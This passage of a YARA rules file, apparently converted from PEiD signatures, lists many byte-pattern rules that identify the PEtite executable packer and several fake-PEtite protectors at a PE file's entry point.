pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_PEtite_2x_level_0: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v20: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v21: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_PEtite_21_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 02 03 03 03 03 04 04 04 04 05 05 05 05 00 70 70 01 00 02 00 03 00 04 00 05 00 07 00 09 00 0D 00 11 00 19 00 21 00 31 00 41 00 61 00 81 00 C1 00 01 01 81 01 01 02 01 03 01 04 01 06 01 08 01 0C 01 10 01 18 01 20 01 30 01 40 01 60 00 00 00 00 01 01 02 02 03 03 04 04 05 05 06 06 07 07 08 08 09 09 0A 0A 0B 0B 0C 0C 0D 0D 10 11 12 00 08 07 09 06 0A 05 0B 04 0C 03 0D 02 0E 01 0F 58 2C 08 50 8B C8 8B D0 81 C1 ?? D2 00 00 81 C2 ?? ?? 00 00 89 20 8B E1 50 81 2C 24 00 ?? ?? ?? FF 30 50 80 04 24 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n        $b = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_PEtite_22_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v22_wwwun4seencompetite_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n        $b = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_12: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 }\r\n        $b = { ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PackerPetite_v22_Compresor_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?0 ?? 00 6? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 ?? ?? ?? ?? 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }\r\n        $b = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 79 00 00 00 85 C0 74 30 5F 5F 58 5A 8B 4A 0C C1 F9 02 33 C0 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB 9E 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 7E 01 6A 10 8B D8 66 05 77 01 50 52 6A 00 03 1B FF 13 6A FF FF 53 08 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_PEtite_21_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 2B 00 00 00 0D 0A 0D 0A 0D 0A 52 65 67 69 73 74 41 72 65 64 20 74 6F 3A 20 4E 4F 4E 2D 43 4F 4D 4D 45 52 43 49 41 4C 21 21 0D 0A 0D 0A 0D 00 58 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v12_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v22_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 ?? ?? 00 ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n        $b = { B8 00 ?0 ?? 00 6? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_22_c1998_99_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n        $b = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEtite_v21_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_12_c1998_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v14: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v13: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n        $b = { 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PEtite_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_PE_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 6A 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 70 BC 00 00 6A 00 FF 50 1C 8B CC 8D A0 70 BC 00 00 89 61 2E 68 00 00 00 00 51 8B 7C 24 04 8B 33 66 81 C7 80 07 8D 74 1E 08 89 3B 53 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v14_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 59 F3 A5 83 C8 FF 8B DF AB 40 AB 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_PEtite_2x_level_0_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 B8 00 90 90 00 6A 00 68 90 90 90 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 03 00 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n        $b = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_v21_2_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13a: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 66 9C 60 50 8D 88 00 00 00 00 8D 90 00 00 00 00 8B DC 8B E1 68 00 00 00 00 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DC 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_2: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v21_1_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_22_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 00 00 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A 00 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_v_after_v14_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_14_c1998_99_Ian_Luck_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC 8D A0 54 BC 00 00 50 8B C3 8D 90 ?? 16 00 00 68 00 00 ?? ?? 51 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 D8 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 79 00 00 00 85 C0 74 30 5F 5F 58 5A 8B 4A 0C C1 F9 02 33 C0 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB 9E 45 52 52 4F 52 21 00 43 6F 72 72 75 70 74 20 44 61 74 61 21 00 8B 64 24 24 8B 04 24 83 C4 26 8B D0 66 81 C2 7E 01 6A 10 8B D8 66 05 77 01 50 52 6A 00 03 1B FF 13 6A FF FF 53 08 56 57 8B 7C 24 0C 8B 74 24 10 8B 4C 24 14 C1 F9 02 F3 A5 8B 4C 24 14 83 E1 03 F3 A4 5F 5E C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n        $b = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Petite_13_c1998_Ian_Luck_h: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 83 C7 68 81 C6 ?? ?? 00 00 F3 A5 FF D3 58 8D 90 B8 01 00 00 8B 0A 0F BA F1 1F 73 16 8B 04 24 FD 8B F0 8B F8 03 72 04 03 7A 08 F3 A5 83 C2 0C FC EB E2 83 C2 10 8B 5A F4 85 DB 74 D8 8B 04 24 8B 7A F8 03 F8 52 8D 34 01 EB 17 58 58 58 5A 74 C4 E9 1C FF FF FF 02 D2 75 07 8A 16 83 EE FF 12 D2 C3 81 FB 00 00 01 00 73 0E 68 60 C0 FF FF 68 60 FC FF FF B6 05 EB 22 81 FB 00 00 04 00 73 0E 68 80 81 FF FF 68 80 F9 FF FF B6 07 EB 0C 68 00 83 FF FF 68 00 FB FF FF B6 08 6A 00 32 D2 4B A4 33 C9 83 FB 00 7E A4 E8 AA FF FF FF 72 17 A4 30 5F FF 4B EB ED 41 E8 9B FF FF FF 13 C9 E8 94 FF FF FF 72 F2 C3 }\r\n        $b = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 72 04 03 7A 08 8B 0A F3 A5 83 C2 0C FC EB D4 8B 7A 08 03 F8 8B 5A 04 85 DB 74 13 52 53 57 03 02 50 E8 7B 00 00 00 85 C0 74 2E 5F 5F 58 5A 8B 4A 0C C1 F9 02 F3 AB 8B 4A 0C 83 E1 03 F3 AA 83 C2 10 EB A0 45 52 52 4F 52 21 00 43 6F 72 72 75 